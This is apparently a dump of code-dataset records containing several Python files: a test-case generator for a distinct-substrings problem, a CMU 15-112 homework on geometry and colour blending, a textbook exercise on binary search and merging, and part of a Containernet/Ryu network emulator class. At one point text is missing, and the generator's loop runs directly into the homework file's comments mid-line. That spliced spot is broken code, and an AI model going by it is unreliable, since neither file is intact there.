You need to tell him the answer for every case.\nNote\nDistinct substrings of 'aabb',1,3 are 'a', 'b', 'ab', 'bb', 'abb'\n\n## Input Format ##\nFirst line: t test cases\nNext 2t lines:\nString s\nstart end\n\n## Constraints ##\n1 ≤ t ≤ 25000\n1 ≤ |s| ≤ 100\n1 ≤ start ≤ end ≤ |s|\n\n## Output Format ##\nFor each question, print a single line containing the integer\n'''\nimport os\nimport datetime\nimport helper\nfrom helper import TEST_DIR, INPUT_DIR, OUTPUT_DIR, INPUT_PRE, OUTPUT_PRE, FILE_EXT\nPROBLEM_NUM = '02' # Change according to problem number in contest\n\n# Solution\ndef distinct_substrings(string, start, end):\n sub = string[start:end+1]\n subs = []\n for i in range(len(sub)):\n for j in range(i, len(sub)):\n subs.append(sub[i:j+1])\n return len(set(subs))\n\n\n# Sample cases\nprint()\nSAMPLE = [\n {'string': 'aabb', 'start': 1, 'end': 3},\n {'string': 'aabbcc', 'start': 2, 'end': 5},\n {'string': 'vwznubfitkdexrqqmedtycnfk', 'start': 12, 'end': 17},\n {'string': 'nlovipenxsdekjhpumufpdxqmhppsenky', 'start': 16, 'end': 25},\n]\nprint('Sample Output:')\nfor sample in SAMPLE:\n print(distinct_substrings(sample['string'],sample['start'],sample['end']))\nprint()\n\n\n# Build tests\nfnum = input(\"Enter testfile num: \")\nfin = open(os.path.join(os.path.join(os.path.join(TEST_DIR,PROBLEM_NUM),INPUT_DIR),INPUT_PRE+fnum+FILE_EXT),'w')\nfout = open(os.path.join(os.path.join(os.path.join(TEST_DIR,PROBLEM_NUM),OUTPUT_DIR),OUTPUT_PRE+fnum+FILE_EXT),'w')\nt = int(input(\"Test cases: \"))\nfin.write(str(t)+'\\n')\n\nTIME = []\nfor i in range(t):\n # Inputs\n n = helper.get_random(1,2,100)\n string = ''.join(chr(96+x) for x in helper.get_random(n,1,26))\n start = helper.get_random(1,0,n-1)\n end = helper.get_random(1,start,n-1)\n # Result\n START = datetime.datetime.now()\n res = distinct_substrings(string,start,end)\n END = datetime.datetime.now()\n TIME.append(END-START)\n # File write\n print(i,res)\n input_line = string + '\\n' + str(start) + ' ' + str(end)\n output_line = str(res)\n if i+1 s3 => s1 + s2 + s3 > s3 + s3\n # s2 + s3 > s1 => s1 + s2 + s3 > s1 + s1\n # s1 + s3 > s2 => s2 + s1 + s3 > s2 + s2\n if (s1 <= 0) or (s2 <= 0) or (s3 <= 0): return False\n longestSide = max(s1, s2, s3)\n return 2 * longestSide < (s1 + s2 + s3)\n\ndef distance(x1, y1, x2, y2):\n return math.sqrt((x1 - x2) ** 2 + (y1 - y2) ** 2)\n\ndef isRightTriangle(x1, y1, x2, y2, x3, y3):\n s1 = distance(x1, y1, x2, y2)\n s2 = distance(x2, y2, x3, y3)\n s3 = distance(x3, y3, x1, y1)\n\n if isLegalTriangle(s1,s2, s3):\n hypotenuse = max(s1, s2, s3)\n if math.isclose(hypotenuse, s3):\n if math.isclose((s3 ** 2), (s1 ** 2 + s2 ** 2)): return True\n elif math.isclose(hypotenuse, s2):\n if math.isclose((s2 ** 2), (s1 ** 2 + s3 ** 2)): return True\n elif math.isclose(hypotenuse, s1):\n if math.isclose((s1 ** 2), (s2 ** 2 + s3 ** 2)): return True\n\n return False\n\ndef extractColor(rgb, component):\n if component == 'R':\n return rgb // (10 ** 6)\n elif component == 'G':\n return (rgb % (10 ** 6)) // (10 ** 3)\n elif component == 'B':\n return rgb % (10 ** 3)\n else:\n return 0\n\ndef colorBlender(rgb1, rgb2, midpoints, n):\n\n if n < 0 or n > midpoints + 1:\n return None\n\n nGaps = midpoints + 1\n\n r1 = extractColor(rgb1, 'R')\n g1 = extractColor(rgb1, 'G')\n b1 = extractColor(rgb1, 'B')\n\n r2 = extractColor(rgb2, 'R')\n g2 = extractColor(rgb2, 'G')\n b2 = extractColor(rgb2, 'B')\n\n deltaR = (r2 - r1) / nGaps\n deltaG = (g2 - g1) / nGaps\n deltaB = (b2 - b1) / nGaps\n\n nthR = roundHalfUp(r1 + (n * deltaR))\n nthG = 
roundHalfUp(g1 + (n * deltaG))\n nthB = roundHalfUp(b1 + (n * deltaB))\n\n return (nthR * (10 ** 6)) + (nthG * (10 ** 3)) + nthB\n\ndef bonusFindIntRootsOfCubic(a, b, c, d) :\n p = (-1) * (b / (3 * a))\n q = (p ** 3) + (((b * c) -(3 * a * d))/(6 * a * a))\n r = c / (3 * a)\n\n # Given one real root, the equation can be decomposed to get the form below:\n # ax^3 + bx^2 + cx + d = (x - root1)(ax^2 + (b + a * root1)x + c + b * root1 + a * root1^2)\n #Quadratic Equation: ax^2 + (b + a * root1)x + c + b * root1 + a * root1^2\n\n # Extract the real part of the (possibly) complex root. Ignore the imaginary part.\n root1 = ((q + (((q ** 2) + ((r - (p ** 2)) ** 3)) ** 0.5)) ** (1/3) + \\\n (q - (((q ** 2) + ((r - (p ** 2)) ** 3)) ** 0.5)) ** (1/3) + p).real\n\n # Solve the quadratic equation for the other two roots. Again, extract the real\n # part of the complex number as z.real, where z is complex.\n aq = a\n bq = b + (a * root1)\n cq = c + (b * root1) + (a * (root1 ** 2))\n\n # Cannot use math.sqrt() for negative values. Use pow instead.\n root2 = (((-1) * bq + pow(((bq ** 2) - (4 * aq * cq)),0.5)) / (2 * aq)).real\n root3 = (((-1) * bq - pow(((bq ** 2) - (4 * aq * cq)),0.5)) / (2 * aq)).real\n\n # The solution is guaranteed to be integers for the exercise. Hence, round to\n # the nearest integer with ties going away from zero.\n root1 = roundHalfUp(root1)\n root2 = roundHalfUp(root2)\n root3 = roundHalfUp(root3)\n\n # Sort the three roots in ascending order\n rmin = min(root1, root2, root3)\n rmax = max(root1, root2, root3)\n rmid = root1 + root2 + root3 - (rmin + rmax)\n\n return rmin, rmid, rmax\n\n#################################################\n# Hw1 Test Functions\n#################################################\n\ndef testFabricYards():\n print('Testing fabricYards()... ', end='')\n assert(fabricYards(0) == 0)\n assert(fabricYards(1) == 1)\n assert(fabricYards(35) == 1)\n assert(fabricYards(36) == 1)\n assert(fabricYards(37) == 2)\n assert(fabricYards(72) == 2)\n assert(fabricYards(73) == 3)\n assert(fabricYards(108) == 3)\n assert(fabricYards(109) == 4)\n print('Passed.')\n \ndef testFabricExcess():\n print('Testing fabricExcess()... ', end='')\n assert(fabricExcess(0) == 0)\n assert(fabricExcess(1) == 35)\n assert(fabricExcess(35) == 1)\n assert(fabricExcess(36) == 0)\n assert(fabricExcess(37) == 35)\n assert(fabricExcess(72) == 0)\n assert(fabricExcess(73) == 35)\n assert(fabricExcess(108) == 0)\n assert(fabricExcess(109) == 35)\n print('Passed.')\n\ndef testIsRightTriangle():\n print('Testing isRightTriangle()... ', end='')\n assert(isRightTriangle(0, 0, 0, 3, 4, 0) == True)\n assert(isRightTriangle(1, 1.3, 1.4, 1, 1, 1) == True)\n assert(isRightTriangle(9, 9.12, 8.95, 9, 9, 9) == True)\n assert(isRightTriangle(0, 0, 0, math.pi, math.e, 0) == True)\n assert(isRightTriangle(0, 0, 1, 1, 2, 0) == True)\n assert(isRightTriangle(0, 0, 1, 2, 2, 0) == False)\n assert(isRightTriangle(1, 0, 0, 3, 4, 0) == False)\n print('Passed.')\n\ndef testColorBlender():\n print('Testing colorBlender()... 
', end='')\n # http://meyerweb.com/eric/tools/color-blend/#DC143C:BDFCC9:3:rgbd\n assert(colorBlender(220020060, 189252201, 3, -1) == None)\n assert(colorBlender(220020060, 189252201, 3, 0) == 220020060)\n assert(colorBlender(220020060, 189252201, 3, 1) == 212078095)\n assert(colorBlender(220020060, 189252201, 3, 2) == 205136131)\n assert(colorBlender(220020060, 189252201, 3, 3) == 197194166)\n assert(colorBlender(220020060, 189252201, 3, 4) == 189252201)\n assert(colorBlender(220020060, 189252201, 3, 5) == None)\n # http://meyerweb.com/eric/tools/color-blend/#0100FF:FF0280:2:rgbd\n assert(colorBlender(1000255, 255002128, 2, -1) == None)\n assert(colorBlender(1000255, 255002128, 2, 0) == 1000255)\n assert(colorBlender(1000255, 255002128, 2, 1) == 86001213)\n assert(colorBlender(1000255, 255002128, 2, 2) == 170001170)\n assert(colorBlender(1000255, 255002128, 2, 3) == 255002128)\n print('Passed.')\n\ndef getCubicCoeffs(k, root1, root2, root3):\n # Given roots e,f,g and vertical scale k, we can find\n # the coefficients a,b,c,d as such:\n # k(x-e)(x-f)(x-g) =\n # k(x-e)(x^2 - (f+g)x + fg)\n # kx^3 - k(e+f+g)x^2 + k(ef+fg+eg)x - kefg\n e,f,g = root1, root2, root3\n return k, -k*(e+f+g), k*(e*f+f*g+e*g), -k*e*f*g\n\ndef testFindIntRootsOfCubicCase(k, z1, z2, z3):\n a,b,c,d = getCubicCoeffs(k, z1, z2, z3)\n result1, result2, result3 = bonusFindIntRootsOfCubic(a,b,c,d)\n m1 = min(z1, z2, z3)\n m3 = max(z1, z2, z3)\n m2 = (z1+z2+z3)-(m1+m3)\n actual = (m1, m2, m3)\n assert(almostEqual(m1, result1))\n assert(almostEqual(m2, result2))\n assert(almostEqual(m3, result3))\n\ndef testBonusFindIntRootsOfCubic():\n print('Testing findIntRootsOfCubic()...', end='')\n testFindIntRootsOfCubicCase(5, 1, 3, 2)\n testFindIntRootsOfCubicCase(2, 5, 33, 7)\n testFindIntRootsOfCubicCase(-18, 24, 3, -8)\n testFindIntRootsOfCubicCase(1, 2, 3, 4)\n print('Passed.')\n\n#################################################\n# Hw1 Main\n#################################################\n\ndef testAll():\n testFabricYards()\n testFabricExcess()\n testIsRightTriangle()\n testColorBlender()\n testBonusFindIntRootsOfCubic()\n\ndef main():\n bannedTokens = (\n #'False,None,True,and,assert,def,elif,else,' +\n #'from,if,import,not,or,return,' +\n 'as,break,class,continue,del,except,finally,for,' +\n 'global,in,is,lambda,nonlocal,pass,raise,repr,' +\n 'try,while,with,yield,' +\n #'abs,all,any,bool,chr,complex,divmod,float,' +\n #'int,isinstance,max,min,pow,print,round,sum,' +\n '__import__,ascii,bin,bytearray,bytes,callable,' +\n 'classmethod,compile,delattr,dict,dir,enumerate,' +\n 'eval,exec,filter,format,frozenset,getattr,globals,' +\n 'hasattr,hash,help,hex,id,input,issubclass,iter,' +\n 'len,list,locals,map,memoryview,next,object,oct,' +\n 'open,ord,property,range,repr,reversed,set,' +\n 'setattr,slice,sorted,staticmethod,str,super,tuple,' +\n 'type,vars,zip,importlib,imp,string,[,],{,}')\n cs112_s17_linter.lint(bannedTokens=bannedTokens) # check style rules\n testAll()\n\nif __name__ == '__main__':\n main()\n","repo_name":"theguyoverthere/CMU15-112-Spring17","sub_path":"src/Week1/Homework/hw1.py","file_name":"hw1.py","file_ext":"py","file_size_in_byte":9306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"18364521333","text":"\"\"\"\nMission: To return a list of words from a text that are not in our vocab\n\nRequirements:\nmust search through a text to find an item\nmust return a list of unknown words in a list\nmust read a file and return its content in a 
list\n\"\"\"\nfrom unit_tester import test\nimport time\n\n\ndef linear_search(array, target):\n \"\"\"Searches for an item in a list in a linear fashion\"\"\"\n for i, item in enumerate(array):\n if item == target:\n return i\n return -1\n\n\ndef binary_search(array, target):\n \"\"\"implementation of binary search to find a target item\"\"\"\n low = 0\n high = len(array)\n\n while True:\n\n if low == high:\n return -1\n\n mid_index = (high + low) // 2\n mid_item = array[mid_index]\n\n if mid_item == target:\n return mid_index\n\n elif mid_item < target:\n low = mid_index + 1\n\n else:\n high = mid_index\n\n\ndef get_words_in_file(filename):\n \"\"\"gets the words from a file and returns a list of the words free of punctuation\"\"\"\n f = open(filename)\n content = f.read()\n f.close()\n words = clean_text(content)\n return words\n\n\ndef clean_text(content):\n \"\"\"takes a string and returns the punctuation-free lowercase string version in a list\"\"\"\n my_substitutions = content.maketrans(\n \"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&()*+,-./:;<=>?@[]^_`{|}~'\\\\\",\n \"abcdefghijklmnopqrstuvwxyz                                          \",\n )\n\n cleaned_text = content.translate(my_substitutions)\n wds = cleaned_text.split()\n return wds\n\n\ndef remove_adjacent_dups(array):\n \"\"\"removes adjacent duplicates from a list\"\"\"\n no_duplicates = []\n most_recent = None\n for item in array:\n if item != most_recent:\n no_duplicates.append(item)\n most_recent = item\n\n return no_duplicates\n\n\ndef merge(array1, array2):\n \"\"\"merges two sorted lists into a single sorted list\"\"\"\n array1_pointer = 0\n array2_pointer = 0\n merged = []\n\n while True:\n if array1_pointer >= len(array1):\n merged.extend(array2[array2_pointer:])\n return merged\n if array2_pointer >= len(array2):\n merged.extend(array1[array1_pointer:])\n return merged\n\n if array1[array1_pointer] <= array2[array2_pointer]:\n merged.append(array1[array1_pointer])\n array1_pointer += 1\n\n else:\n merged.append(array2[array2_pointer])\n array2_pointer += 1\n
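\n\n# Quick illustration (commented out so importing this module does not print\n# anything extra; values checked against the functions above):\n#\n# combined = merge([1, 3, 5], [1, 2, 3]) # [1, 1, 2, 3, 3, 5]\n# unique = remove_adjacent_dups(combined) # [1, 2, 3, 5]\n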
\n\ndef find_unknown_merge_pattern(vocab, wds):\n \"\"\"Both the vocab and the words must be sorted. Returns a new list of words from wds that do not occur in vocab\"\"\"\n xi = 0\n yi = 0\n result = []\n while True:\n if xi >= len(vocab):\n result.extend(wds[yi:])\n return result\n\n if yi >= len(wds):\n return result\n\n if vocab[xi] == wds[yi]:\n yi += 1\n elif vocab[xi] < wds[yi]:\n xi += 1\n else:\n result.append(wds[yi])\n yi += 1\n\n\ndef unknown_words(vocab, text):\n \"\"\"collects all the words that appear in text that are not in the vocab\"\"\"\n unknown = []\n for word in text:\n if binary_search(vocab, word) < 0:\n unknown.append(word)\n return unknown\n\n\ndef test_suite():\n friends = \"Joe Zoe Brad Angelina Zuki Thandi Paris\".split()\n print(\"\\n Linear Search\")\n test(linear_search(friends, \"Zoe\") == 1)\n test(linear_search(friends, \"Joe\") == 0)\n test(linear_search(friends, \"Paris\") == 6)\n test(linear_search(friends, \"Bill\") == -1)\n\n print(\"\\n Unknown Words\")\n vocab = \"apple boy dog down fell girl grass the tree\".split()\n book_words = \"the apple fell from the tree to the grass\".split()\n test(unknown_words(vocab, book_words) == [\"from\", \"to\"])\n test(unknown_words([], book_words) == book_words)\n test(unknown_words(vocab, [\"the\", \"boy\", \"fell\"]) == [])\n\n print(\"\\n clean_text\")\n test(clean_text(\"My name is Earl!\") == \"my name is earl\".split())\n test(clean_text(\"Well, I never!, said Alice.\") == \"well i never said alice\".split())\n\n print(\"\\n Binary Search\")\n xs = [2, 3, 5, 7, 11, 13, 17, 23, 29, 31, 37, 43, 47, 53]\n test(binary_search(xs, 20) == -1)\n test(binary_search(xs, 99) == -1)\n test(binary_search(xs, 1) == -1)\n for (i, v) in enumerate(xs):\n test(binary_search(xs, v) == i)\n\n print(\"\\n Remove Duplicates\")\n test(remove_adjacent_dups([1, 2, 3, 3, 3, 3, 5, 6, 9, 9]) == [1, 2, 3, 5, 6, 9])\n test(remove_adjacent_dups([]) == [])\n test(\n remove_adjacent_dups([\"a\", \"big\", \"big\", \"bite\", \"dog\"])\n == [\"a\", \"big\", \"bite\", \"dog\"]\n )\n\n print(\"\\n Merge Sorted\")\n xs = [1, 3, 5, 7, 9, 11, 13, 15, 17, 19]\n ys = [4, 8, 12, 16, 20, 24]\n zs = xs + ys\n zs.sort()\n test(merge(xs, []) == xs)\n test(merge(xs, ys) == zs)\n test(merge([1, 2, 3], [3, 4, 5]) == [1, 2, 3, 3, 4, 5])\n test(\n merge([\"a\", \"big\", \"cat\"], [\"big\", \"bite\", \"dog\"])\n == [\"a\", \"big\", \"big\", \"bite\", \"cat\", \"dog\"]\n )\n\n\nbigger_vocab = get_words_in_file(\"vocab.txt\")\nall_words = get_words_in_file(\"alice_in_wonderland.txt\")\n\n\nt0 = time.process_time()\nall_words.sort()\nbook_words = remove_adjacent_dups(all_words)\nmissing_words = find_unknown_merge_pattern(bigger_vocab, book_words)\nt1 = time.process_time()\n\nprint(\"There are {0} unknown words.\".format(len(missing_words)))\nprint(\"That took {0:.4f} seconds.\".format(t1 - t0))\n","repo_name":"Tyrhen/Thinkcspy_Solutions","sub_path":"Chapter14/Chapter14_AW.py","file_name":"Chapter14_AW.py","file_ext":"py","file_size_in_byte":5589,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"10771342729","text":"import logging\nimport time\nimport re\nimport requests\nimport os\nimport json\nimport networkx as nx\nfrom subprocess import Popen\n# from gevent import monkey\nfrom mininet.net import Containernet\nfrom mininet.node import OVSSwitch, OVSKernelSwitch, Docker, RemoteController\nfrom mininet.cli import CLI\nfrom mininet.link import TCLink\nfrom mininet.clean import cleanup\nfrom emuvim.dcemulator.monitoring import DCNetworkMonitor\nfrom emuvim.dcemulator.node import Datacenter,
EmulatorCompute\nfrom emuvim.dcemulator.resourcemodel import ResourceModelRegistrar\n\n# ensure correct functionality of all gevent based REST servers\n# monkey.patch_all()\n\n# setup logging\nLOG = logging.getLogger(\"dcemulator.net\")\nLOG.setLevel(logging.DEBUG)\n\n# default CPU period used for cpu percentage-based cfs values (microseconds)\nCPU_PERIOD = 1000000\n\n# default priority setting for added flow-rules\nDEFAULT_PRIORITY = 1000\n# default cookie number for new flow-rules\nDEFAULT_COOKIE = 10\n\n\nclass DCNetwork(Containernet):\n \"\"\"\n Wraps the original Mininet/Containernet class and provides\n methods to add data centers, switches, etc.\n\n This class is used by topology definition scripts.\n \"\"\"\n\n def __init__(self, controller=RemoteController, monitor=False,\n enable_learning=False,\n # learning switch behavior of the default ovs switches icw Ryu\n # controller can be turned off/on, needed for E-LAN\n # functionality\n dc_emulation_max_cpu=1.0, # fraction of overall CPU time for emulation\n dc_emulation_max_mem=512, # emulation max mem in MB\n **kwargs):\n \"\"\"\n Create an extended version of a Containernet network\n :param dc_emulation_max_cpu: max. CPU time used by containers in data centers\n :param kwargs: path through for Mininet parameters\n :return:\n \"\"\"\n # members\n self.dcs = {}\n self.ryu_process = None\n # list of deployed nsds.E_Lines and E_LANs (uploaded from the dummy\n # gatekeeper)\n self.deployed_nsds = []\n self.deployed_elines = []\n self.deployed_elans = []\n self.installed_chains = []\n\n # always cleanup environment before we start the emulator\n self.killRyu()\n cleanup()\n\n # call original Docker.__init__ and setup default controller\n Containernet.__init__(\n self, switch=OVSKernelSwitch, controller=controller, **kwargs)\n\n # default switch configuration\n enable_ryu_learning = False\n if enable_learning:\n self.failMode = 'standalone'\n enable_ryu_learning = True\n else:\n self.failMode = 'secure'\n\n # Ryu management\n if controller == RemoteController:\n # start Ryu controller\n self.startRyu(learning_switch=enable_ryu_learning)\n\n # add the specified controller\n self.addController('c0', controller=controller)\n\n # graph of the complete DC network\n self.DCNetwork_graph = nx.MultiDiGraph()\n\n # initialize pool of vlan tags to setup the SDN paths\n self.vlans = list(range(1, 4095))[::-1]\n\n # link to Ryu REST_API\n ryu_ip = 'localhost'\n ryu_port = '8080'\n self.ryu_REST_api = 'http://{0}:{1}'.format(ryu_ip, ryu_port)\n self.RyuSession = requests.Session()\n\n # monitoring agent\n if monitor:\n self.monitor_agent = DCNetworkMonitor(self)\n else:\n self.monitor_agent = None\n\n # initialize resource model registrar\n self.rm_registrar = ResourceModelRegistrar(\n dc_emulation_max_cpu, dc_emulation_max_mem)\n self.cpu_period = CPU_PERIOD\n\n def addDatacenter(self, label, metadata={}, resource_log_path=None):\n \"\"\"\n Create and add a logical cloud data center to the network.\n \"\"\"\n if label in self.dcs:\n raise Exception(\"Data center label already exists: %s\" % label)\n dc = Datacenter(label, metadata=metadata,\n resource_log_path=resource_log_path)\n dc.net = self # set reference to network\n self.dcs[label] = dc\n dc.create() # finally create the data center in our Mininet instance\n LOG.info(\"added data center: %s\" % label)\n return dc\n\n def addLink(self, node1, node2, **params):\n \"\"\"\n Able to handle Datacenter objects as link\n end points.\n \"\"\"\n assert node1 is not None\n assert node2 is not None\n\n # 
ensure type of node1\n if isinstance(node1, str):\n if node1 in self.dcs:\n node1 = self.dcs[node1].switch\n if isinstance(node1, Datacenter):\n node1 = node1.switch\n # ensure type of node2\n if isinstance(node2, str):\n if node2 in self.dcs:\n node2 = self.dcs[node2].switch\n if isinstance(node2, Datacenter):\n node2 = node2.switch\n # try to give containers a default IP\n if isinstance(node1, Docker):\n if \"params1\" not in params:\n params[\"params1\"] = {}\n if \"ip\" not in params[\"params1\"]:\n params[\"params1\"][\"ip\"] = self.getNextIp()\n if isinstance(node2, Docker):\n if \"params2\" not in params:\n params[\"params2\"] = {}\n if \"ip\" not in params[\"params2\"]:\n params[\"params2\"][\"ip\"] = self.getNextIp()\n # ensure that we allow TCLinks between data centers\n # TODO this is not optimal, we use cls=Link for containers and TCLink for data centers\n # see Containernet issue:\n # https://github.com/mpeuster/containernet/issues/3\n if \"cls\" not in params:\n params[\"cls\"] = TCLink\n\n link = Containernet.addLink(self, node1, node2, **params)\n\n # try to give container interfaces a default id\n node1_port_id = node1.ports[link.intf1]\n if isinstance(node1, Docker):\n if \"id\" in params[\"params1\"]:\n node1_port_id = params[\"params1\"][\"id\"]\n node1_port_name = link.intf1.name\n\n node2_port_id = node2.ports[link.intf2]\n if isinstance(node2, Docker):\n if \"id\" in params[\"params2\"]:\n node2_port_id = params[\"params2\"][\"id\"]\n node2_port_name = link.intf2.name\n\n # add edge and assigned port number to graph in both directions between node1 and node2\n # port_id: id given in descriptor (if available, otherwise same as port)\n # port: portnumber assigned by Containernet\n\n attr_dict = {}\n # possible weight metrics allowed by TClink class:\n weight_metrics = ['bw', 'delay', 'jitter', 'loss']\n edge_attributes = [p for p in params if p in weight_metrics]\n for attr in edge_attributes:\n # if delay: strip ms (need number as weight in graph)\n match = re.search('([0-9]*\\.?[0-9]+)', str(params[attr]))\n if match:\n attr_number = match.group(1)\n else:\n attr_number = None\n attr_dict[attr] = attr_number\n\n attr_dict2 = {'src_port_id': node1_port_id, 'src_port_nr': node1.ports[link.intf1],\n 'src_port_name': node1_port_name,\n 'dst_port_id': node2_port_id, 'dst_port_nr': node2.ports[link.intf2],\n 'dst_port_name': node2_port_name}\n attr_dict2.update(attr_dict)\n self.DCNetwork_graph.add_edge(\n node1.name, node2.name, **attr_dict2)\n\n attr_dict2 = {'src_port_id': node2_port_id, 'src_port_nr': node2.ports[link.intf2],\n 'src_port_name': node2_port_name,\n 'dst_port_id': node1_port_id, 'dst_port_nr': node1.ports[link.intf1],\n 'dst_port_name': node1_port_name}\n attr_dict2.update(attr_dict)\n self.DCNetwork_graph.add_edge(\n node2.name, node1.name, **attr_dict2)\n\n LOG.debug(\"addLink: n1={0} intf1={1} -- n2={2} intf2={3}\".format(\n str(node1), node1_port_name, str(node2), node2_port_name))\n\n return link\n\n def removeLink(self, link=None, node1=None, node2=None):\n \"\"\"\n Remove the link from the Containernet and the networkx graph\n \"\"\"\n if link is not None:\n node1 = link.intf1.node\n node2 = link.intf2.node\n assert node1 is not None\n assert node2 is not None\n Containernet.removeLink(self, link=link, node1=node1, node2=node2)\n # TODO we might decrease the loglevel to debug:\n try:\n self.DCNetwork_graph.remove_edge(node2.name, node1.name)\n except BaseException:\n LOG.warning(\"%s, %s not found in DCNetwork_graph.\" %\n ((node2.name, 
node1.name)))\n        try:\n            self.DCNetwork_graph.remove_edge(node1.name, node2.name)\n        except BaseException:\n            LOG.warning(\"%s, %s not found in DCNetwork_graph.\" %\n                        ((node1.name, node2.name)))\n\n    def addDocker(self, label, **params):\n        \"\"\"\n        Wrapper for addDocker method to use custom container class.\n        \"\"\"\n        self.DCNetwork_graph.add_node(label, type=params.get('type', 'docker'))\n        return Containernet.addDocker(\n            self, label, cls=EmulatorCompute, **params)\n\n    def removeDocker(self, label, **params):\n        \"\"\"\n        Wrapper for removeDocker method to update graph.\n        \"\"\"\n        self.DCNetwork_graph.remove_node(label)\n        return Containernet.removeDocker(self, label, **params)\n\n    def addExtSAP(self, sap_name, sap_ip, **params):\n        \"\"\"\n        Wrapper for addExtSAP method to store SAP also in graph.\n        \"\"\"\n        # make sure that 'type' is set\n        params['type'] = params.get('type', 'sap_ext')\n        self.DCNetwork_graph.add_node(sap_name, type=params['type'])\n        return Containernet.addExtSAP(self, sap_name, sap_ip, **params)\n\n    def removeExtSAP(self, sap_name, **params):\n        \"\"\"\n        Wrapper for removeExtSAP method to remove SAP also from graph.\n        \"\"\"\n        self.DCNetwork_graph.remove_node(sap_name)\n        return Containernet.removeExtSAP(self, sap_name)\n\n    def addSwitch(self, name, add_to_graph=True, **params):\n        \"\"\"\n        Wrapper for addSwitch method to store switch also in graph.\n        \"\"\"\n\n        # add this switch to the global topology overview\n        if add_to_graph:\n            self.DCNetwork_graph.add_node(\n                name, type=params.get('type', 'switch'))\n\n        # set the learning switch behavior\n        if 'failMode' in params:\n            failMode = params['failMode']\n        else:\n            failMode = self.failMode\n\n        s = Containernet.addSwitch(\n            self, name, protocols='OpenFlow10,OpenFlow12,OpenFlow13', failMode=failMode, **params)\n\n        return s\n\n    def getAllContainers(self):\n        \"\"\"\n        Returns a list with all containers within all data centers.\n        \"\"\"\n        all_containers = []\n        for dc in self.dcs.values():\n            all_containers += dc.listCompute()\n        return all_containers\n\n    def start(self):\n        # start\n        for dc in self.dcs.values():\n            dc.start()\n        Containernet.start(self)\n\n    def stop(self):\n\n        # stop the monitor agent\n        if self.monitor_agent is not None:\n            self.monitor_agent.stop()\n\n        # stop emulator net\n        Containernet.stop(self)\n\n        # stop Ryu controller\n        self.killRyu()\n\n    def CLI(self):\n        CLI(self)\n\n    def setLAN(self, vnf_list):\n        \"\"\"\n        Set up an E-LAN network by assigning the same VLAN tag to each DC interface of the VNFs in the E-LAN\n\n        :param vnf_list: names of the VNFs in this E-LAN [{name:,interface:},...]\n        :return:\n        \"\"\"\n        src_sw = None\n        src_sw_inport_name = None\n\n        # get a vlan tag for this E-LAN\n        vlan = self.vlans.pop()\n\n        for vnf in vnf_list:\n            vnf_src_name = vnf['name']\n            vnf_src_interface = vnf['interface']\n\n            # check if port is specified (vnf:port)\n            if vnf_src_interface is None:\n                # take first interface by default (wrap in list() since networkx 2.x returns an iterator)\n                connected_sw = list(self.DCNetwork_graph.neighbors(vnf_src_name))[0]\n                link_dict = self.DCNetwork_graph[vnf_src_name][connected_sw]\n                vnf_src_interface = link_dict[0]['src_port_id']\n\n            for connected_sw in self.DCNetwork_graph.neighbors(vnf_src_name):\n                link_dict = self.DCNetwork_graph[vnf_src_name][connected_sw]\n                for link in link_dict:\n                    if (link_dict[link]['src_port_id'] == vnf_src_interface or\n                            link_dict[link]['src_port_name'] == vnf_src_interface):  # Fix: we might also get interface names, e.g, from a son-emu-cli call\n                        # found the right link and connected switch\n                        src_sw = connected_sw\n                        src_sw_inport_name = 
link_dict[link]['dst_port_name']\n                        break\n\n            # set the tag on the dc switch interface\n            LOG.debug('set E-LAN: vnf name: {0} interface: {1} tag: {2}'.format(\n                vnf_src_name, vnf_src_interface, vlan))\n            switch_node = self.getNodeByName(src_sw)\n            self._set_vlan_tag(switch_node, src_sw_inport_name, vlan)\n\n    def getNodeByName(self, name):\n        \"\"\"\n        Wraps Containernet's getNodeByName method to avoid\n        key not found exceptions.\n        \"\"\"\n        try:\n            return super(DCNetwork, self).getNodeByName(name)\n        except BaseException as ex:\n            LOG.warning(\"Node not found: {}\".format(name))\n            LOG.debug(\"Node not found: {}\".format(ex))\n            return None\n\n    def _addMonitorFlow(self, vnf_src_name, vnf_dst_name, vnf_src_interface=None, vnf_dst_interface=None,\n                        tag=None, **kwargs):\n        \"\"\"\n        Add a monitoring flow entry that adds a special flowentry/counter at the beginning or end of a chain.\n        So this monitoring flowrule exists on top of a previously defined chain rule and uses the same vlan tag/routing.\n        :param vnf_src_name:\n        :param vnf_dst_name:\n        :param vnf_src_interface:\n        :param vnf_dst_interface:\n        :param tag: vlan tag to be used for this chain (same tag as existing chain)\n        :param monitor_placement: 'tx' or 'rx' indicating to place the extra flowentry resp. at the beginning or end of the chain\n        :return:\n        \"\"\"\n\n        src_sw = None\n        src_sw_inport_nr = 0\n        src_sw_inport_name = None\n        dst_sw = None\n        dst_sw_outport_nr = 0\n        dst_sw_outport_name = None\n\n        LOG.debug(\"call AddMonitorFlow vnf_src_name=%r, vnf_src_interface=%r, vnf_dst_name=%r, vnf_dst_interface=%r\",\n                  vnf_src_name, vnf_src_interface, vnf_dst_name, vnf_dst_interface)\n\n        # check if port is specified (vnf:port)\n        if vnf_src_interface is None:\n            # take first interface by default (wrap in list() since networkx 2.x returns an iterator)\n            connected_sw = list(self.DCNetwork_graph.neighbors(vnf_src_name))[0]\n            link_dict = self.DCNetwork_graph[vnf_src_name][connected_sw]\n            vnf_src_interface = link_dict[0]['src_port_id']\n\n        for connected_sw in self.DCNetwork_graph.neighbors(vnf_src_name):\n            link_dict = self.DCNetwork_graph[vnf_src_name][connected_sw]\n            for link in link_dict:\n                if (link_dict[link]['src_port_id'] == vnf_src_interface or\n                        link_dict[link]['src_port_name'] == vnf_src_interface):  # Fix: we might also get interface names, e.g, from a son-emu-cli call\n                    # found the right link and connected switch\n                    src_sw = connected_sw\n                    src_sw_inport_nr = link_dict[link]['dst_port_nr']\n                    src_sw_inport_name = link_dict[link]['dst_port_name']\n                    break\n\n        if vnf_dst_interface is None:\n            # take first interface by default (wrap in list() since networkx 2.x returns an iterator)\n            connected_sw = list(self.DCNetwork_graph.neighbors(vnf_dst_name))[0]\n            link_dict = self.DCNetwork_graph[connected_sw][vnf_dst_name]\n            vnf_dst_interface = link_dict[0]['dst_port_id']\n\n        vnf_dst_name = vnf_dst_name.split(':')[0]\n        for connected_sw in self.DCNetwork_graph.neighbors(vnf_dst_name):\n            link_dict = 